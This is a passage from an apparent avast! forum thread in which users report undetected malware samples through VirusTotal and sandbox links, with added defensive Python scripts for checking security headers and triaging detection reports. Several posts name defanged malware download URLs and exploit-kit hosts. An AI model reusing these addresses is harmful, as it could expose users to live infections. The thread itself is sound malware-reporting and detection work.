Payload of IE 0-day
https://www.virustotal.com/file/a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9/analysis/
reported to avast! 8)
-
Hi true indian,
As you can see the payload is the infostealer bancos y trojan variant. For Threat Expert awareness of this file and what subfiles it creates, see: http://www.threatexpert.com/files/111.exe.html
polonus
-
Again Malware on avast! facebook wall...
https://www.virustotal.com/file/2d9b9a8860ce97177891ca1bb5e7faba880eb079e2d8025762d6a72518e96a90/analysis/1348247024/
reported to avast!
-
I'm not sure if it's malware, but I found it and it looks suspicious:
1 file
https://www.virustotal.com/file/fd115514291e2855c204decc03270628e3dbe7c8da0dc797c1ce1389fd2a0ba8/analysis/1348657526/
2 file
https://www.virustotal.com/file/7abc66b037c23f80fbb861e02f894900c9b9590bf70b10852d28a84229109aa4/analysis/1348657408/
3 file
https://www.virustotal.com/file/e3f10f3119da4f4a54c5c99508c5314265f177046898b3b7f811e3febeb6e0d1/analysis/1348657652/
-
@ sality
Have you sent the files to avast! labs via e-mail or from the chest??
-
Yep, I sent them yesterday.
-
Yes, that's good...keep sending them if they are not detected :)
-
These temp files were never found to be malicious: http://www.threatexpert.com/files/100.exe.html
polonus
-
Yes, VirusTotal said it's clean, but I started it on my virtual machine, and it was weird. I sent it to avast too.
-
New Dorifel-variant downloading the zero access rootkit not detected: https://www.virustotal.com/file/6d32a06be42f9c9b09038279d5121c8f9edd3fc3d5c670f3691d20d92dcddbff/analysis/1348728915/#additional-info
Time for TDSS killer investigations from our malware removal experts; the zero access rootkit performing clickfraud is a mighty nasty threat at the moment going under the av radar. The new Dorifel variants seem to be more aggressive than the former...
Malware produces a new unique hash making it harder to detect. This domain was registered: https://forum.perfect-privacy.com/member.php/?u=4578
The ransom hijacker uses a picture of Mohamed Ali, formerly known as Cassius Clay. A special Dorifel decrypter should be used for the encrypted documents:
http://www.surfright.nl/nl/support/dorifel-decrypter. Information from SurfRight; kudos go to Mark Loman and Fabian Wosar...
polonus
P.S. Regarding the Perfect Privacy Forum, I'd like to add the following security information:
web bug detector gives a webbug on that very page: https://forum.perfect-privacy.com/member.php/cron.php?s=073e2639f73d26cb026449410960b785&rand=1351336814
so that is not very encouraging for establishing the right privacy circumstances,
and makes the site vulnerable to attacks, see: http://drupal.org/node/1080486 (link article author Drew Mathers).
It should be protected at the webserver layer.
Executing code on your webserver from remote is always a security risk.
cron.php only runs once, so the risk is not that extreme,
but users of Drupal should be aware to not give access.
Renaming cron.php is no option, because it is security through obscurity.
Private cache control is alerted for not following best practice, no secure attribute for cookie bb sessionhash,
settings not secure for x-content-type-options N/A, x-xss-protection N/A, x-frame-options N/A,
x-content-security-policy N/A, strict-transport-security N/A.
Check this yourself using the Recx Security Analyzer extension on that page.
Privacy rating does not go further than a meagre 70,
Damian
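The header and cookie points listed in the post above (the N/A security headers, the missing Secure attribute on the session cookie, the private cache control) can be checked offline against a saved response. The script below is an added example written for this page; it is not code from the thread, from Recx or from the forum software. The raw response it audits is constructed for the demo and the cookie values are made up; it is not a capture of the site discussed.

```python
from __future__ import annotations

# Constructed sample response for the demo (not a real capture). It
# deliberately reproduces the pattern reported in the post: a session
# cookie without Secure, a second cookie without HttpOnly, Cache-Control
# set only to "private", and none of the hardening headers present.
SAMPLE_RESPONSE = b"\r\n".join([
    b"HTTP/1.1 200 OK",
    b"Date: Sat, 27 Oct 2012 10:00:00 GMT",
    b"Server: Apache",
    b"Content-Type: text/html; charset=UTF-8",
    b"Cache-Control: private",
    b"Set-Cookie: bbsessionhash=0123456789abcdef; path=/; HttpOnly",
    b"Set-Cookie: bblastvisit=1351336814; path=/",
    b"",
    b"<html>...</html>",
])

# Headers the Recx-style check reports as N/A when absent. The older
# X-Content-Security-Policy name is accepted as an alias for CSP.
EXPECTED_HEADERS = {
    "x-content-type-options": (),
    "x-xss-protection": (),
    "x-frame-options": (),
    "content-security-policy": ("x-content-security-policy",),
    "strict-transport-security": (),
}


def parse_response(raw: bytes) -> tuple[dict[str, str], list[str]]:
    """Split a raw HTTP/1.1 response into a header map and the list of Set-Cookie values."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: dict[str, str] = {}
    cookies: list[str] = []
    for line in lines[1:]:                       # skip the status line
        name, _colon, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            cookies.append(value)                # repeatable header: keep every instance
        else:
            headers[name] = value
    return headers, cookies


def cookie_attributes(cookie: str) -> tuple[str, set[str]]:
    """Return (cookie name, lower-cased attribute names such as 'secure', 'httponly')."""
    parts = [p.strip() for p in cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit(raw: bytes, served_over_https: bool = True) -> list[str]:
    """Return the findings a practitioner would raise for this response."""
    headers, cookies = parse_response(raw)
    findings: list[str] = []
    for header, aliases in EXPECTED_HEADERS.items():
        if header not in headers and not any(a in headers for a in aliases):
            findings.append(f"missing header: {header}")
    for cookie in cookies:
        name, attrs = cookie_attributes(cookie)
        if served_over_https and "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly")
    cache = headers.get("cache-control", "").lower()
    if "no-store" not in cache:
        # "private" alone still lets the browser cache the authenticated page
        findings.append("cache-control does not include no-store")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        print(finding)
```

Point it at a response saved with curl -i or from a proxy; a Set-Cookie header is parsed per instance because browsers treat each one separately, and the Secure check is skipped for a plain-HTTP capture because the flag has no meaning there.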
-
Found via Facebook: http://zulu.zscaler.com/submission/show/f635b729ae5ed08dfc8831847acc9661-1349284508
redirects to: http://zulu.zscaler.com/submission/show/04d2c77ccb3d047a3fa861f651a3b3fa-1349284530
Reported this to virus AT avast DOT com
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/838f9ca46793bd5c5f0735d2e9a67119b5166f71813ea9449b7e03dd7d28f00f/analysis/1349348552/
sent to avast! labs..
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/85a9a7a7d9fd52c9d3bce6a31733b0e4f71f31d602c161588aa86a42b11bf99c/analysis/1349411730/
sent to avast!
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/dbd19a5b301e20b6dfaed8da671d0ce8b0f81a671352727ee579942ba23aa81c/analysis/
sent to avast!
-
Malware On Avast! FB Wall
https://www.virustotal.com/file/1c52c6efc89a8bb32c8dd75e77e72bb6d61ba5a31dc5fa56a143e7b9151a1688/analysis/1350048692/
sent to avast!
P.S. it has a avast icon too ;D
-
Exploit.HTML.IframeRef!IK
https://www.virustotal.com/file/d280279a32686ba766b8c6375e9f79338d1ea0c750752ad2090d5cba2feafc7f/analysis/1350208298/
reported to avast!
-
Good catch. :)
-
As an update to my previous detection of the iframe: the site that is loaded by the iframe is already detected: http://vscan.novirusthanks.org/analysis/6674455f2c5206efa75a21c86081a339/dGVzdC1odG0=/
So we should be protected anyway.
-
Malware on avast! FB Wall
https://www.virustotal.com/file/fa7fd9b5686c3f0410bd8e9f2ad1bd638389584b2d96112d60eec59485d51375/analysis/1350970912/
reported to avast! ;)
-
Hi true indian,
We have detection now: https://www.virustotal.com/file/fa7fd9b5686c3f0410bd8e9f2ad1bd638389584b2d96112d60eec59485d51375/analysis/
we are being protected,
polonus
-
Not detected? http://zulu.zscaler.com/submission/show/59273a77959881472c65c7243ccb05e7-1351595253
see: https://www.virustotal.com/file/776303a0a9794f0abc8696c395892d84de37b050c5adb76e2f7fe64f594090e1/analysis/
alive and OVERDUE 2012-08-23 12:11:59
New analysis report to be found here: http://anubis.iseclab.org/?action=result&task_id=1d980218979be3ed4452737f984e83694&format=html
reported to virus AT avast dot com
polonus
-
Another one: http://zulu.zscaler.com/submission/show/b3dd2a02c23620b356526f878291ee61-1351612010
See: https://www.virustotal.com/file/ea1a86e40ae76052c7828153c600a8a9b1de438d7596977eadb252ee2a722847/analysis/
reported to virus AT avast dot com
polonus
-
First seen by VirusTotal
2009-12-15 14:10:46 UTC ( 2 years, 10 months ago )
Emsisoft: Riskware.Keygen.WinRAR (A)
Still in question for avast analysts if it's to be detected or left alone. We may even have sandbox detection.
-
Trojan.GBPBoot.1 new MBR infector :o
http://news.drweb.com/show/?lng=ru&i=2927&c=9
Reported to virus AT avast DOT com 8)
-
Probably a Trojan:
https://www.virustotal.com/file/87be42ea7c8de7fde284b9149352a6fab551d386f0c545e1c0ff6de61798d49e/analysis/1352363750/
Reported to virus AT avast DOT com. ;D
-
See: https://www.virustotal.com/file/be37b9b39f41510e4941e63528bf6e96/analysis/
Malware still alive: http://malc0de.com/database/index.php?search=filepop.co.kr%2Fdown_fs%2F00000001_fsetup_703_20.exe%09
should this be detected is the question:
First seen by VirusTotal
2011-05-31 09:56:00 UTC ( 1 year, 5 months ago )
Spreading via IP: hxtp://211.215.18.239/ which is being blocked by MBAM IP Blocker!!!
Reported all the discovered URL's to virus AT avast DOT com
-
See: https://www.virustotal.com/file/214713c0f6d00003fdbac583cc585fd6ce8256f2cdc3da43cf29bbe496cf180a/analysis/
&
http://minotauranalysis.com/search.aspx?q=8fa6c23df708ae478322bf3c17921917
polonus
-
Missed: https://www.virustotal.com/file/faf4ac103a1caf42c691f05e9a829cb3d7a0ab967956fadb28f064dd5eb07f4f/analysis/
reported to Virus AT Avast DOT com
-
Backdoor:Java/Jacksbot.A :o
EDIT: VT link removed..
reported to virus AT Avast DOT com
-
Suspicious for Trojan Downloader.
https://www.virustotal.com/file/91d48f6c435d0b4adec680a25dd809c9a3d9c497b7b6e64a41e1418bcf697e2d/analysis/1353393295/
reported to Virus AT Avast Dot Com
-
Hi true indian,
Was not this posted by your alter ego? http://forums.malwarebytes.org/index.php?showtopic=118370
polonus
-
Missed: https://www.virustotal.com/file/f61a6a3e1922ba9df7be668966efc8a7fc0183336539bb7da2f85f15fbd9ce28/analysis/
Reported to virus AT avast DOT com
-
(New) KaiXin Exploit Kit 1.1
https://www.virustotal.com/file/88af04ee7c18a3487e83b06b6c945dd858a4716de157a8d23f879eda47114ec2/analysis/
https://www.virustotal.com/file/9cf6c1f26c235b0922d1f20552403bb18e9cc660d6c1f4ff419426879719127a/analysis/
For more information see my comments.
~!Donovan
-
Hello,
I have submitted the file below 3 times to avast, however it is still not being detected:
https://www.virustotal.com/file/27947b0c0acc357a8637f7d0d3dc27119bcf4fa3e68b07d2b3cf8e49c083db60/analysis/1354784726/
Thanks for your time!
-
Hi Tonanet,
It is being flagged here: http://www.isthisfilesafe.com/sha1/80DD271CB1A9A52A7467B15D16AA4D8DF447D398_details.aspx
Could be the avast shields flag it?
polonus
-
Hi !Donovan,
I went after the IDS alert for "Detected live KaiXin exploit kit" at urlquery.net and saw that DrWeb has a very good detection rate for this exploit kit's malware.
htxp://adsup.co.kr/pgm/ avast detects here: https://www.virustotal.com/file/5004b899bc5c8dd17e3b54cf28f930484e9f1e6c36de1a28a61de2c9cd61cc76/analysis/
htxp://204.13.71.29/home/flash.html I get "The network link was interrupted while negotiating a connection." Must be the ZeroExploit shield intervening or the ABP malware block list enabled...
These are the IDS sigs: http://comments.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/17956 (info author = gmane)
Emerging Threats Daily Rulesets update: http://www.emergingthreats.net/2012/11/
polonus
-
Hello Polonus,
Thanks for the reply.
It seems to be a new file, as this one isn't detected by Avast, AVG or Panda with the latest definitions...
Thanks for your time,
Tonanet
-
Hi Tonanet,
Yes, will be reported to virus AT avast dot com,
polonus
-
New Unknown Malware: http://certcc.ir/index.php?name=news&file=article&sid=2293
According to Crysis it's a batch wiper...
reported all samples to virus AT avast DOT com. 8)
-
See: http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/?utm_source=rss&utm_medium=rss&utm_campaign=batchwiper-just-another-wiping-malware (article author = Jaime Blasco). Quote from Jaime Blasco:
We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.
pol
-
Latest update on that malware news: http://www.securelist.com/en/blog/208194052/GrooveMonitor_Another_Wiper_Copycat (article author = Roel)
Malware does not function on 64-bit Windows apparently,
polonus
-
https://www.virustotal.com/file/ca822605407966dbdf338b6596cbf08109b469d0535cf1b37f61a6eda69f754c/analysis/1355898491/
-
Hi mrapi,
Here I also get a zero flag result: http://f.virscan.org/ezcddax.zip.html
As it is an MS crack it should be suspicious by nature,
polonus
-
Missed: https://www.virustotal.com/file/bf8b0bc0c8e1db52d94719fb01db1765/analysis/
reported to virus AT avast DOT com
-
https://www.virustotal.com/file/d8f57888cfe31d104b04bc30747120d9e1a69b2a1f82c7165936fc45f07ccfba/analysis/1356492745/
https://www.virustotal.com/file/99a2c01acb8b237f7ec3d526533cde343df64c8e6d0dd5e7afe004beeff2d051/analysis/1356492737/
https://www.virustotal.com/file/b24f4498fc40fc8b80bd79c0364ff3dbe2fba5379fe4322988a81f55ac8c2cca/analysis/1356492726/
https://www.virustotal.com/file/e1f7108d21edb1b836ad96b7b7d26ec82b8d1d7e11ff7a3a1061308ded0f59fb/analysis/
2 Tepfer trojans and 1 Lockscreen Missed and not being detected even after being reported constantly by me >:(
Reported again virus AT avast DOT com
-
This one missed: https://www.virustotal.com/file/d8f57888cfe31d104b04bc30747120d9e1a69b2a1f82c7165936fc45f07ccfba/analysis/
See: http://siteinspector.comodo.com/public/recent_detections/show_website?url=http%3A%2F%2Fsecegbiw.ru
See: http://zulu.zscaler.com/submission/show/4ca58b921729091c2f7df9dc8a9cf884-1356435452
polonus
-
Win32/Reveton.N
https://www.virustotal.com/file/4420885eb5e32c29f344691c36ff3732c2244e2704a28f5fd7c0f6ed90501493/analysis/1356664948/
Reported to virus AT avast DOT com
-
Trojan
https://www.virustotal.com/file/78d356dd295f27ba3b893beed6492a40f7feb8bfb4f2ed3e3f717beb84dbc2a0/analysis/
Already submitted through the chest.
-
Trojan
https://www.virustotal.com/file/8389e8a4f61c818f521bd4c214d989f84ff7d451905f030494539eaf73503f81/analysis/
Submitted from email.
-
Suspicious
https://www.virustotal.com/file/5db455071ca1bcf62ebbda43ad94646c521c1d179fd5b49fa57c774e6a43fd2e/analysis/
Submitted from email.
-
Trojan
https://www.virustotal.com/file/53377d93e3dfdf32a05befde859b034379b924dc33f1fe8c457508c521e2689a/analysis/
Backdoor
https://www.virustotal.com/file/02bdf5cdb3ce4a36a950b181e624c178765552b1a62ec98c02279a4e38d58e91/analysis/
FakeAV
https://www.virustotal.com/file/5f3ed8095cb3e5f5a171454dfe90473a94970bd929d2e46e69359bcb2bce9b7f/analysis/
Submitted from email.
-
ZeroAccess
https://www.virustotal.com/file/63d13ceff8870228b6b0f2e08b0274541884e255c6c299908b37464d4afef24f/analysis/
Submitted from email.
-
Trojan
https://www.virustotal.com/file/78d356dd295f27ba3b893beed6492a40f7feb8bfb4f2ed3e3f717beb84dbc2a0/analysis/
Already submitted through the chest.
ZeroAccess
https://www.virustotal.com/file/63d13ceff8870228b6b0f2e08b0274541884e255c6c299908b37464d4afef24f/analysis/
Submitted from email.
Avast network shield is already blocking the websites that give these 2 infections as bad URLs... so you don't need to worry about the sig detection... anyway, thanks for sending!!! ;)
Trojan
https://www.virustotal.com/file/8389e8a4f61c818f521bd4c214d989f84ff7d451905f030494539eaf73503f81/analysis/
Submitted from email.
First seen by VirusTotal
2012-09-16 23:40:32 UTC ( 3 months, 1 week ago )
You sure this still exists in terms of real-life usage??
On everything else... I would say good catch!!!! But keep in mind a lot of the web infections get blocked by the network shield URL blocker before we even have sig detection... just see to it you don't report samples from already blocked URLs ;D
-
Found via a USB stick... it's Ramnit!!!
https://www.virustotal.com/file/29defdc42517a3e5137ab0fe3d201a8f9d053fc669ca4dc6e172785a3e3c4dfb/analysis/1356753297/
Reported to virus AT avast DOT com
FakeAV
https://www.virustotal.com/file/73eb87b0012138c2120e0ecb5e503cf3/analysis/
sent to labs!
-
Adware (good detection rate).
https://www.virustotal.com/file/0f0cc0ac9f3bcdd540c566c690a072e8861c6cab268eb9e98534bfc7a6e59239/analysis/
sent to lab.
-
Hi true indian,
Found that here: 2012-12-26 [D] carlahahn dot de/jqYnYs8B.exe 1FE5C899B8DF52C198B1582CE15B30A4 39D96ED5A5DBFFF3A2EF5782851541356070AA8E 284672 82.165.87.2 M TE R MG UQ Data from VX Vault
DrWeb URL checker detects: Checking:htxp://carlahahn.de/jqYnYs8B.exe
Engine version:7.0.4.9250
Total virus-finding records:3513894
File size:277.50 KB
File MD5:4ff9db792185de2457cb3c6ddc91da53
htxp://carlahahn.de/jqYnYs8B.exe packed by FLY-CODE
>htxp://carlahahn.de/jqYnYs8B.exe probably infected with Trojan.Packed.196
polonus
-
Malware
https://www.virustotal.com/file/82d77152b6fe8b61267186db7b947d7ddc8e69e9fcd70f5720dc0fdcd08b58a5/analysis/
submitted to lab.
-
See: http://www.runscanner.net/lib/TOP.exe.html
and
http://www.pcpitstop.com/libraries/process/i/TPop.exe.html
Could well be that avast will detect this as a PUP (Potentially Unwanted Program) when you try to run it for the first time....
polonus
-
brand new trojan
https://www.virustotal.com/file/5fd73990c07b9fed483678689ed03ade960bea8921a0be5514b7040653e7add5/analysis/
submitted to lab.
-
Hi spywar,
Did you check for shield detection? Did you report to virus AT avast dot com? See: http://www.processlibrary.com/directory/files/tibia/427525/
and http://www.threatexpert.com/files/tibia.exe.html
Here Bitdefender TrafficLight alerts this download link as malware: htxp://pedump.me/a5ea47f911614697d0b2ce85222909a1/
See: https://www.virustotal.com/url/b328e6eff71a370b3c5d37df4df0bd264154209f2e2a935866f6135c9cb6df74/analysis/1356652004/
All detections in the past were from NOD32 only ->
http://webcache.googleusercontent.com/search?client=flock&channel=fds&q=cache:eB2tyD05MPMJ:http://v.virscan.org/Win32/PSW.Tibia.NGI%2520trojan.html%2Bhttp://v.virscan.org/Win32/PSW.Tibia.NGI%2520trojan.html&oe=utf-8&hl=en&ct=clnk
polonus
-
Yes checked for shield detection, submitted via "virus@avast.com" yes.
-
trojan downloader
https://www.virustotal.com/file/f77ab065b1a6051582646f576792a6e8c76cd5d0227b8d69b52a490cabee3b1f/analysis/
submitted to lab.
-
Ransomware
https://www.virustotal.com/file/2fba9a749f631961f7a0541dc75bec0a75268c02b41a8f26caa60982f0c39704/analysis/
submitted to lab.
-
Spywar, I hope you are checking the URLs from where you get the samples... and not reporting samples coming from URLs that network shield already blocks.... btw, that's a banker malware, not a ransom... it's funny how even the big Kaspersky misses that one. ;D
I even see you have a nice catch on malware that has been out since past weeks and AV companies tend to miss them... Keep up the great work!
-
They don't come from a URL ;D
-
trojan downloader (not from a URL)
https://www.virustotal.com/file/d95f3016c1aefd77ad80cef058b22c8cdbe88d6776d09f4e8cd352f15fc9bdd6/analysis/
sent to lab.
also, about 60 samples sent to lab.
-
1 week old certified malware
https://www.virustotal.com/file/aad3fd0acdb9610a921a8d4776b56254116a8122c434c066f2963c0d35f33385/analysis/
sent to lab.
-
1 week old sample
https://www.virustotal.com/file/6d46e93f812f504bba42c027ca380522d9d6359feb68ad553490701bfcee1242/analysis/
Detection ratio: 40 / 46
sent to lab.
-
Worm delf
https://www.virustotal.com/file/8941c06058682a75f43e5f0b24a85b99aaff9ba66b8c37e851cad35c5f51e3ab/analysis/
sent to lab.
-
1 week old sample
https://www.virustotal.com/file/6d46e93f812f504bba42c027ca380522d9d6359feb68ad553490701bfcee1242/analysis/
Detection ratio: 40 / 46
sent to lab.
the VT scan here is 4 days old....sure it is not detected?
-
Worm delf
https://www.virustotal.com/file/8941c06058682a75f43e5f0b24a85b99aaff9ba66b8c37e851cad35c5f51e3ab/analysis/
sent to lab.
this VT scan is 2 days old....sure it is not detected?
why not post latest VT scan ?
-
I scan the folder with PUP detection enabled.
-
There really is no need to make a new post for every sample sent.
The other point, my particular hobby horse: this topic is pointless. These reports do nothing, they can't be analysed; only sending the samples to avast does anything.
So if you have sent the sample, then the post is pointless. Even more so: if you make the report in this topic then really you should follow it up and modify the post when the sample is detected. Otherwise it is just totally unbalanced, only showing missed samples and no follow-up to show the sample has been added to the virus definitions.
If you have sent the sample, all of this additional stuff is moot, pointless, doesn't achieve anything.
-
I too think this topic isn't helpful. I read from the 1st page and saw Milos who said it was pointless, so I have to agree ;)
Of course I send everything to them using email.
In Comodo's forum there is a topic like that, but that's not the same: you submit with VT links, they grab the SHA-1 values for each link and they locate them through their cloud-based DB.
But as you previously said, this topic should be closed.
-
Topics generally don't get closed unless they infringe general forum policy, which this doesn't.
But it really is pointless as every now and then I drop my little reminder. For any SHA-1 # to be collected it would require constant monitoring by someone in the virus labs and my guess they have better things to be getting on with.
-
What could be worth mentioning in this thread is malware that is so-called "long overdue" malware and has not been detected by avast for some time, or for which detection was never added.
Long overdue is a particular malware that has been active for say 1200 hrs and over, for which many av solutions have detection and (only some and) avast has not.
Avast is known to have certain "blind spots", e.g. certain types of malware where it does not reach over-average detection percentages or even less (e.g. in the past certain banking trojans were missed).
Then another particular phenomenon is that for instance DrWeb's and avast's detection overlap. I mean to say what avast detects DrWeb does not and vice versa.
There are a couple of issues we have to consider.
A large proportion of malcode is blocked and alerted by the avast shields.
Then there is malware that no longer exists and is still listed as active elsewhere, while the malware has been closed or isn't active any longer.
Another thing is that checking av detection related to Intrusion Detection alerts (like URLquery gives) could add detections.
Then there is another issue that makes the use of this thread less reliable. That is that VT results do not measure up all of anti-malware detection, because they only give part of the overall detection.
Another issue is with VirusWatch when we compare the percentage of av solutions' detection of a certain type of malware.
Again here we also have a good parameter to get certain patterns where a certain av solution is so-called "under par" compared to others.
It is a good thing that a lot of sites are not being visited because of Google Safebrowsing alerts in certain browsers.
Or users must ignore these alerts, which is a stupid thing to do.
Some users like Bitdefender's TrafficLight, Trustwave or WOT, and DrWeb's URLChecker to guide them through search engine results pages, or Netcraft's anti-phishing extension. So there are traffic lights, red, yellow and green, to consider while surfing or clicking.
Extensions like NoScript and RequestPolicy are always a good option for further added overall in-browser protection if you know how to use and toggle these extension settings. And in certain cases it could be an option to run a browser in a sandbox...
polonus
-
In all honesty that too is pretty pointless; reporting here is going to do nothing, sample submission rules.
People posting here don't go back even a day to their previous reports to confirm they have been added to the virus definitions, what makes you think they are going to go back much further.
As I have said for so long this topic really is pointless when we can't/shouldn't attach samples, reports are not samples and samples sent directly to avast are king.
-
Hi DavidR,
I do go back to check on detection, hope others do likewise. But in case this gives negative results it should be reported somewhere, else no one or only the in-crowd would know clearly where we stand (detection level). Some like that all would go on "out of sight" and we would have so-called perfect "security through obscurity". I have always been against security through obscurity as far as this is concerned.
Not everyone will visit e.g. VirusWatch clean mx and will look up a certain malware to see the overall detection range of various av solutions to know where "avast has dropped stitches in their knitting work". Positive criticism always helps a good product to even get better and that is and always has been the aim of this avast user...
polonus,
-
You are probably the exception to the rule, but even so it still doesn't get away from the point that posting here doesn't actually get anything done. Only sample submission does, so for me it is just wasted effort when there are other valuable things you could be doing with your time.
-
Hi DavidR,
Prior to reporting any missed detection here or in any other thread on the avast webforums I have reported to virus AT avast dot com when I thought that would help. This should be priority one.
I know these reports are/were helpful. I would encourage others to do likewise. There are many of us here.
Sending samples will help, sending suspicious uri's will help.
Someone there should use the material towards better shield blocking, better script alerts, follow the IDS implementation consequences etc. etc.
I am certain that our efforts here have helped towards avast detection. The expertise achieved over time in website content analysis, potentially suspicious script analysis, website software vulnerabilities and attack pattern awareness has helped avast detection.
Also know that malware removers in training are being sent here for instruction (also, for instance, to !Donovan's site) and so the mutual efforts bring results,
polonus
-
I'm not talking about any other actions other than this topic.
The effort of posting here achieves nothing as has been confirmed by a member of the virus labs, the only thing that helps them is the receipt of samples. So those that are doing it have already played a part that this topic simply can't achieve.
What is done outside of this topic doesn't justify or sanction this topic as being useful to avast in getting 'samples' added to the definitions.
-
Hi true indian,
Found that here: 2012-12-26 [D] carlahahn dot de/jqYnYs8B.exe 1FE5C899B8DF52C198B1582CE15B30A4 39D96ED5A5DBFFF3A2EF5782851541356070AA8E 284672 82.165.87.2 M TE R MG UQ Data from VX Vault
DrWeb URL checker detects: Checking:htxp://carlahahn.de/jqYnYs8B.exe
Engine version:7.0.4.9250
Total virus-finding records:3513894
File size:277.50 KB
File MD5:4ff9db792185de2457cb3c6ddc91da53
htxp://carlahahn.de/jqYnYs8B.exe packed by FLY-CODE
>htxp://carlahahn.de/jqYnYs8B.exe probably infected with Trojan.Packed.196
polonus
Hi Pol,
Now Avast! Network shield is actively blocking this URL after I reported the URL and the sample 8)
-
Trojan
https://www.virustotal.com/file/8389e8a4f61c818f521bd4c214d989f84ff7d451905f030494539eaf73503f81/analysis/
Submitted from email.
Here we now have avast! network shield blocking the URL actively.
see: http://zulu.zscaler.com/submission/show/6cabbf804d61debf0e2ed900e3313dd1-1356754537
-
Nice thanks for sharing ;)
-
https://www.virustotal.com/file/e4ce09b9033f9b7d730739319b6519e17ad6c8c00aa16b352683603ee3b2d3df/analysis/1356774989/
https://www.virustotal.com/file/573861426c28f0cfcda20ffeca53741a929de8aaab32b22c65f715dc07fe78b9/analysis/1356775061/
https://www.virustotal.com/file/73dbe3b40ffe5dc90e7b868cb76c47b7a2d006c0122d3907bea219264e96ae5a/analysis/1356775070/
https://www.virustotal.com/file/f22fa0ee469eebb6d419670db69c9ee4bdd7c5be9df14bbfc7c8430a05905873/analysis/1356775073/
https://www.virustotal.com/file/98e65f3b1ca7d6c1e20584c615d6065562b9192785c7892f33cf52dcf249273c/analysis/1356775075/
https://www.virustotal.com/file/7323cb1b27fc132ab1eb5fefc50d80710d08caa3c6562159eae51800bf649ab6/analysis/1356775077/
and about 20 more I won't post here.
All samples sent.
-
Hi Chabbo,
What I discussed on so-called "long overdue" does not concern riskware and particular adware, as the avast PUP or riskware detection does not show in VT results generally. That is why I stated that VT results do not give a good picture of all that avast av detection covers (PUP detection, avast's various shields' detection, etc.). So VT results as a means are not the right tool to measure av detection and av detection patterns.
Then there is also the vulnerability window to be considered. At the beginning there is one, or there are two or three av solutions that detect; then others follow within a couple of hours to a couple of days for the av solutions that are slow to pick up. When 5 av solutions detect we speak of 100/100 % malware (Zulu Zscaler).
Then we have malware that is being launched uniquely every time. There the launch sites or migration sites should be blocked, period. Malware knows various ways to circumvent detection and that is an ongoing chess game between the good and the dark forces on the "Interwebs".
Furthermore we have potentially suspicious files, detected by the fact that some script is running with anomalies; together with IDS alerts other sources of malcreation can be determined and listed (Quttera's, Wepawet, file viewers, urlquery etc.). Then there are blocklists where blocked ranges are only to be lifted if proven to be benign over some timespan (Google Safebrowsing for instance). Another factor is the possible insecurity of websites and how easily they could be re-infected (Sucuri scans, SaferSite, dorks, vendor vulnerability lists) because of server abuse through misconfiguration, outdated website software or bugs in the website software.
There we are running behind the facts always and all of the time, because there is an enormous amount of unawareness from website owners/website admins and even hoster staff as to how to protect the average user from getting infected by visiting their infectious websites. And then we have to add malware launching sites per se, driven by cybercrime and co, on bulletproof and FastFlux webservers with malware that is hard to close down. Here in-browser added security through extensions like NoScript and RequestPolicy could protect the browser user to quite an extent.
So as the odds are against us, still with the right insight users can be online free of malware for years and years. To educate others how to achieve this is why we are here and do what we do,
polonus
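The two polonus posts above (the "long overdue" rule of thumb, and the caveats about the vulnerability window and about VT results not showing shield or PUP coverage) describe a triage rule that can be written down and run over a batch of VT reports before anything is mailed to the lab. The script below is an added example for this page, not code from the thread, from avast or from VirusTotal. The sample records, hashes, hosts and detection names are constructed; the 1200 hour and 5 engine thresholds come from the posts; and the set of "blocked hosts" stands in for true indian's point that samples from URLs the network shield already blocks are not worth reporting.

```python
from __future__ import annotations

from datetime import datetime, timezone

LONG_OVERDUE_HOURS = 1200    # "active for say 1200 hrs and over" (thread rule of thumb)
CONSENSUS_DETECTIONS = 5     # "when 5 av solutions detect" (Zulu Zscaler rule cited in the thread)

# Fixed reference time so the example is reproducible; an assumption, not a real event.
NOW = datetime(2012, 12, 28, tzinfo=timezone.utc)

# Constructed records in the shape of a VT report summary. The sha256 values and
# hosts are placeholders and the detection names are illustrative only.
SAMPLES = [
    {"sha256": "a" * 64, "first_seen": "2012-09-16T23:40:32Z", "host": "old-dropper.example",
     "results": {"avast": None, "DrWeb": "Trojan.Packed.196", "Kaspersky": "Trojan.Win32.Generic",
                 "ESET": "Win32/Kryptik", "Microsoft": "TrojanDownloader:Win32/Generic",
                 "Sophos": "Mal/Generic-S"}},
    {"sha256": "b" * 64, "first_seen": "2012-12-27T10:00:00Z", "host": "fresh.example",
     "results": {"avast": None, "DrWeb": "Trojan.Packed.197", "Kaspersky": "UDS:DangerousObject",
                 "ESET": None, "Microsoft": None, "Sophos": None}},
    {"sha256": "c" * 64, "first_seen": "2012-12-01T00:00:00Z", "host": "known.example",
     "results": {"avast": "Win32:Malware-gen", "DrWeb": None, "Kaspersky": "Trojan.Win32.Generic"}},
    {"sha256": "d" * 64, "first_seen": "2012-06-01T00:00:00Z", "host": "blocked.example",
     "results": {"avast": None, "DrWeb": "Generic", "Kaspersky": "Generic", "ESET": "Generic",
                 "Microsoft": "Generic", "Sophos": "Generic"}},
    {"sha256": "e" * 64, "first_seen": "2012-12-20T00:00:00Z", "host": "recent.example",
     "results": {"avast": None, "DrWeb": "Generic", "Kaspersky": "Generic", "ESET": "Generic",
                 "Microsoft": "Generic", "Sophos": "Generic"}},
]


def parse_vt_time(ts: str) -> datetime:
    """VT-style 'YYYY-MM-DDTHH:MM:SSZ' timestamp to an aware UTC datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def age_hours(first_seen: str, now: datetime = NOW) -> float:
    """Hours the sample has been known to VT at the reference time."""
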